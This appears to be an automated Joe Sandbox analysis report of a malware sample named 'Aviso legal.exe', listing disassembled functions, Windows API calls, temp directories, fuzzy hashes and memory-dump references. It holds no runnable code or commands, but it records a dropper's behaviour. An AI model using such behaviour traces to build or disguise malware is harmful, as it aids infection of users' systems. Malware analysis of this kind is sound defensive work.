C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp$C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll
API String ID: 1659193697-3934058930
Opcode ID: a2d9691ea381e88d042a05527e8249a96b52758ce21b98351f65b3f5d82e54dc
Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
Opcode Fuzzy Hash: a2d9691ea381e88d042a05527e8249a96b52758ce21b98351f65b3f5d82e54dc
Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp, 4u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid
API String ID: 1892508949-3639820270
Opcode ID: e89a9e6a3f09ade376d0d4b3fd71c203f5cd3ef8be9bd613e1140dffb9deb40c
Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
Opcode Fuzzy Hash: e89a9e6a3f09ade376d0d4b3fd71c203f5cd3ef8be9bd613e1140dffb9deb40c
Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E

Function 00401F12 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00405B63: ShellExecuteExW.SHELL32(?), ref: 00405B72

Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401FEB

Strings

@, xrefs: 00401F8A
C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid, xrefs: 00401F6A

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: ChangeCloseCodeExecuteExitFindNotificationObjectProcessShellSingleWait
String ID: @$C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid
API String ID: 4215836453-2875345375
Opcode ID: e9e6b888b2ac62b7866e10c79cc816c8736e15ae282fdec460a2aeb23ba8a534
Instruction ID: 706d8f23dd4fc365793d21c3b3cee38f3579e955c6bce5a1691758ef83551cc9
Opcode Fuzzy Hash: e9e6b888b2ac62b7866e10c79cc816c8736e15ae282fdec460a2aeb23ba8a534
Instruction Fuzzy Hash: 20115B71E042189ADB50EFB9CA49B8CB6F4BF04304F24447AE405F72C1EBBC89459B18

Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll), ref: 0040645C

Strings

Call, xrefs: 00406412

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 0812a69665cf11e377adb3684f8a171474585e26745252b9346dd4e1bc3f05c7
Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
Opcode Fuzzy Hash: 0812a69665cf11e377adb3684f8a171474585e26745252b9346dd4e1bc3f05c7
Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D

Function 00405C01 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00406008: GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
Part of subcall function 00406008: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021

RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405DE3), ref: 00405C1C
DeleteFileW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C24
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C3C

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
Instruction ID: 0274c5225d47ddc366315f3a2fda4b694ad97aa72442a0e2fcdbaf00fd257d87
Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
Instruction Fuzzy Hash: F4E0E53110CF9156E61457309E08F5F2AD8EF86715F05493EF892B10C0CBB848068E6A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C

Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
RegCloseKey.ADVAPI32(00000000), ref: 0040245F

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: b75d323d86fa909671316af8d9fa67dfe1c8e59de469e028d3815ce869cacf85
Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
Opcode Fuzzy Hash: b75d323d86fa909671316af8d9fa67dfe1c8e59de469e028d3815ce869cacf85
Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 5ade1ed26a80a7dd8760c06c43378076533002221f41e68569be4ee1dd8de31a
Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
Opcode Fuzzy Hash: 5ade1ed26a80a7dd8760c06c43378076533002221f41e68569be4ee1dd8de31a
Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D

Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
GetProcAddress.KERNEL32(00000000,?), ref: 00406937

Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E

Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Aviso legal.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
